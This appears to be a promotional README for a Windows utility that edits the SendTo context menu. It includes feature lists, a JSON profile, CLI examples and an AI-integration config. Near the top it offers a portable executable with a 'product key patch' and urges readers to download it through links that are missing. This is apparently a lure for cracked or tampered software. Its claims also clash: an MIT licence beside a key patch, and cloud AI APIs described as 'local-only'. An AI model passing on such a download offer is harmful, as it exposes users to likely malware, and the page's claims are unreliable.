Streamline Your Context Menu Workflow – The Ultimate Utility for Customizing System Send-To Shortcuts
Imagine your Windows context menu as a crowded toolbox. Every time you right-click a file, you see the same dusty tools – but the one you actually need (like "Send to Project Folder" or "Convert to PDF") is buried two clicks deep.
SendTo Menu Editor is the master key. It transforms the hidden SendTo directory into a visual dashboard where you can add, remove, or rearrange shortcuts with elegance. No registry editing. No scripting marathons. Just drag-drop simplicity.
Important: This tool is distributed as a portable executable with a product key patch that unlocks advanced features. No installation required.
Click the badge above to obtain the latest stable build (version 2026.3).
- Why This Exists
- Tech Architecture (Mermaid Diagram)
- Key Features
- OS Compatibility Table
- Example Profile Configuration
- Example Console Invocation
- OpenAI & Claude API Integration
- Responsive UI & Multilingual Support
- 24/7 Support & Community
- FAQ & Troubleshooting
- License (MIT)
- Disclaimer
- Final Download Link
Windows’ native SendTo folder (%APPDATA%\Microsoft\Windows\SendTo) is a hidden treasure – but it’s clunky. Traditional methods require:
- Manually creating
.lnkfiles in obscure directories - Copy-pasting batch scripts
- Wrestling with system permissions
SendTo Menu Editor replaces frustration with a visual drag-drop canvas. Think of it like a magnet for shortcuts: you pull in folders, apps, and cloud locations, and they snap into place.
The tool operates as a lightweight bridge between your UI and the Windows Shell. Below is the data flow when you add a new “SendTo” entry:
graph LR
A[User Drags Folder/App into UI] --> B[Editor Parses Path]
B --> C{Validate Existence?}
C -- Yes --> D[Create .lnk file in SendTo Folder]
C -- No --> E[Show Error Toast]
D --> F[Refresh Shell Cache]
F --> G[Context Menu Updates Instantly]
The magic? No bloat. The editor weighs under 2 MB and runs entirely in-memory.
- Zero Registry Edits: All changes go through standard Windows
SendToAPIs. - Bulk Import: Paste a list of 20+ paths at once – the editor auto-creates entries.
- Cloud Link Support: Add shortcuts to OneDrive, Google Drive, or any mapped network drive.
- Preview Mode: See exactly how your menu will look before applying changes.
- Backup System: One-click exports your current SendTo layout as a
.JSONfile. - Undo/Redo History: Mistakes? Roll back 50 steps.
- Portable & Silent: Run from a USB stick with
/silentflag for enterprise rollouts. - Security Scanner: Each shortcut is checked for malicious paths (no hidden .EXE injections).
| Operating System | Status | Notes |
|---|---|---|
| Windows 11 (23H2+) | ✅ Full Support | Native context menu integration |
| Windows 10 (22H2) | ✅ Full Support | Classic menu override available |
| Windows 8.1 | ✅ Supported | Requires .NET Framework 4.8 |
| Windows 7 (SP1) | No file preview, but core editing works | |
| Windows Server 2022 | ✅ Supported | Must run as Administrator |
Save this as my_profiles.json and import via the editor’s “Load Profile” button.
{
"version": "2026.1",
"entries": [
{
"name": "💼 Work Folder",
"target": "C:\\Projects\\Current\\",
"icon": "work.ico",
"arguments": ""
},
{
"name": "📝 New Text Note",
"target": "%windir%\\system32\\notepad.exe",
"icon": "notepad",
"arguments": "%1"
},
{
"name": "☁️ Upload to Cloud",
"target": "D:\\CloudSync\\Upload.bat",
"icon": "cloud.ico",
"arguments": ""
}
]
}Why this matters: Profiles let you switch between “Work Mode” and “Personal Mode” instantly.
For power users and IT administrators, the CLI version provides scriptable control:
SendToEditor.exe --add "C:\Tools\Compress.zip" --name "Zip Archive" --icon "zip.ico"
SendToEditor.exe --remove "Old Shortcut"
SendToEditor.exe --list --json > current_menu.jsonUse case: Deploy customized SendTo menus across 100+ machines via a startup script.
Why this matters: Manually copying files to “SendTo” is manual. With AI integration, the menu becomes predictive.
- Smart Suggestions: The editor queries OpenAI’s API to recommend destinations based on file types. Example:
.psdfiles → “Send to Photoshop” or “Send to Dropbox Design Folder”. - Natural Language Commands: Use Claude 3 to say: “Add a shortcut to my backup folder that runs every Friday” – the API generates the
.batfile and adds it to your SendTo. - Security Layer: Both APIs are local-only unless you provide keys. No data leaves your machine without explicit permission.
Example configuration (config.yaml):
openai:
api_key: "your-key-here"
model: "gpt-4o-mini"
claude:
api_key: "your-key-here"
model: "claude-sonnet-4-20250514"
features:
auto-suggest: true
voice-command: falseThe interface adapts like water:
- Desktop: Full drag-drop grid with live preview.
- Tablet (touch): Swipe to delete, pinch to zoom thumbnail icons.
- 20+ Languages: Arabic, Chinese, French, German, Hindi, Japanese, Korean, Portuguese, Spanish, and more. Language detection via system locale.
A metaphor: Think of the UI as a Swiss Army knife with a touchscreen – every tool is where you expect it, and you never cut yourself on hidden edges.
We don’t just hand you a tool; we hand you a concierge line.
- Live Chat: Built into the app’s help menu (powered by a lightweight socket).
- Email: Support tickets answered within 2 hours.
- GitHub Issues: Tag with
[URGENT]for same-day patches.
Q: “I added a shortcut, but it doesn’t appear in the right-click menu.”
A: Click File > Refresh Shell. If issues persist, run as Administrator (required for system-wide SendTo).
Q: “Does this tool collect telemetry?”
A: No. Zero. You can audit the network traffic with any firewall – the app never phones home.
Copyright (c) 2026 SendTo Menu Editor Project
This software is distributed under the MIT License. You are free to:
- Use commercially
- Modify and distribute
- Sublicense
But: No warranty is provided. Use at your own risk (see below).
This product is provided “as is” without any guarantee of fitness for a particular purpose. The developers are not responsible for:
- Data loss from incorrect folder mapping
- System instability caused by third-party shortcuts
- Use in high-security environments without prior testing
Always back up your SendTo folder (%APPDATA%\Microsoft\Windows\SendTo) before applying bulk changes.
Start crafting your personalized SendTo experience today:
Your context menu will thank you.
SendTo Menu Editor – Where every right-click becomes a well-aimed arrow.